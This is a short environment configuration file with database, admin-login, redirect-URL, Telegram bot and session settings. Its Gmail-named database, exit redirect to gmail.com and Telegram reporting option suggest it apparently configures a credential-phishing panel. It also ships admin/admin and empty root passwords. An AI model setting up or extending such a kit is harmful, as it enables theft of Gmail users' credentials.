DB_HOST=localhost
DB_NAME=gmail
DB_USER=root
DB_PASS=
ADMIN_USERNAME=admin
ADMIN_PASSWORD=admin
EXIT_URL=https://www.gmail.com
TELEGRAM_ENABLED=false
TELEGRAM_CHAT_ID=
TELEGRAM_BOT_TOKEN=
SESSION_SECRET=change-this-to-a-random-string
PORT=3000
